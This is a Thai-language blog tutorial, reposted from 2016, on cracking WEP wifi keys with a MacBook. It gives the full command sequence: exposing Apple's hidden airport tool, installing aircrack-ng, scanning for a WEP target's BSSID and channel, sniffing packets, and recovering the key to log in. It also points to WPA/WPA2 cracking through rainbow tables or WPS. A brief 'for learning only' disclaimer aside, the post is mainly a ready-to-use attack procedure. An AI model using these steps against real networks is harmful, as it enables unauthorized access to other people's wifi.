Macbook Aircrack and WEP wifi

เขียนเมื่อปี 2016 สมัยเรียน พอดี blog ลบไปแล้วเลยนำกลับมาลงใหม่ที่นี่

Macbook สามารถทำอะไรได้หลายอย่างที่คาดไม่ถึง ซี่รี่ย์ที่จะเล่าให้ฟังต่อจากนี้เป็นความรู้ที่ได้จากผจญภัยไปตามขอบของความเป็นไปได้ด้วย Macbook คู่ใจของเขา ต้องบุกบั่น ฝ่าฟัน พาดผ่าน อุปสรรค อันตรายนานาประการ เห็นได้ชัดเจนจากการล้างเครื่องของเขาที่ทำเกือบจะทุกเดือน

ความรู้ที่ได้นี้ เอาไว้ใช้เพื่อการเรียนรู้เท่านั้นนะครับ อย่าทำให้ผู้อื่นเดือดร้อน

จริงๆแล้ว Macbook เพียงลำพัง(ไม่ต้องซื้อwireless card เพิ่ม)สามารถแกะรหัส WPA/WPA2 ได้เหมือนกัน ใช้เทคนิค [precomputed rainbow table](https://en.wikipedia.org/wiki/Rainbow_table) หรือจะใช้ช่องว่าง [WPS](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup) ก็ได้นะ เก็บไว้เป็นโอกาสหน้านะครับ นักผจญภัยจะมาเล่าเรื่องให้ฟังครับ

มาเริ่มกันเลย

สิ่งที่ต้องใช้มีสองอย่าง หนึ่งคือ Macbook จะเป็นรุ่น Air/Pro ก็ได้หมดนะครับ สองคือเป้าทดสอบเป็น wifi ที่เข้ารหัสแบบ [WEP](https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy) เรามีวิธีสังเกตอย่างหนึ่งคือ

```bash
กด option + คลิกบนไอคอนแสดงไวไฟที่มุมบนขวา
```

ตรง Security ต้องแสดงเป็น WEP นะครับ อย่าง network นี้เป็น WPA2 Enterprise จึงไม่สามารถใช้เป็นตัวทดสอบได้

ต่อมาเราต้องการใช้ hidden tool ของ system ที่ชื่อ airport เราจึงใช้คำสั่งลงบน terminal ครับ

```zsh
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
```

หลังจากนี้เราต้องลง aircrack-ng กันก่อนนะครับ โดยลงผ่าน [brew](http://brew.sh) ใช้คำสั่ง
```zsh
ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
```
ลง aircrack-ng
```zsh
brew install aircrack-ng
```

ตอนนี้เครื่องเราก็มีความพร้อมที่จะกู้รหัสผ่าน network ที่เราต้องการแล้วนะครับ ดูไปพร้อมกันเลยนะครับว่าทำอย่างไร
1. หาข้อมูลเป้าหมาย สิ่งที่ต้องหาคือ BSSID กับ Chanel และตรวจอีกทีให้แน่ใจว่าเป้าหมายใช้ WEP
```zsh
sudo airport -s
```

2. เก็บข้อมูลเป้าหมาย
```zsh
sudo airport en0 sniff <chanel> #ที่ได้จากข้อ 1
```
3. เปิด tab ใหม่เพื่อเริ่มแกะรหัส และให้การเก็บข้อมูลเป็นไปอย่างต่อเนื่อง โดยกด command + t

4. ทำการแกะรหัส! ต้องจำชื่อไฟล์ที่ใหม่ที่สุด(ถ้าสังเกตก็จะพบว่าขนาดไฟล์กำลังใหญ่ขึ้น เพราะกำลังเก็บข้อมูลเป้าหมายไปด้วยนั้นเอง)
```bash
cd /tmp #ไปที่เก็บข้อมูล
ls -lH *.cap #จำชื่อไฟล์ที่เก็บมา เอาอันที่ใหม่ที่สุด
aircrack-ng -a 1 -b <bssid> <ชื่อไฟล์> #bssid ที่ได้จากข้อ 1
```

5. ทดสอบความถูกต้อง โดยนำรหัสที่ได้ ลบเครื่อง”:” ที่คั่นกลางออกแล้วใช้มันเป็นรหัส wifi เช่น จาก “A4:0C:EC:73:15” → “A40CEC7315”

WEP ที่ถูกแกะนั้นคือ WEP 40-bit แต่ถ้าหาก WEP 128-bit การแกะรหัสแบบนี้จะยากมาก(นาน)เพราะคำสั่งนี้ใช้กระบวนการ brute force(ไล่ใส่ทุกๆรหัสที่เป็นไปได้) ดังนั้น WEP ถึงเป็นการเข้ารหัสแบบเก่าก็ไม่จำเป็นว่าจะต้องง่าย และเร็วเสมอไปนะครับ

เครื่องที่ผมใช้คือ Macbook air 13" Early 2014

tags: hack, แฮ็ค, wifi, ไวไฟ, macbook, wep, hotspot, network, crack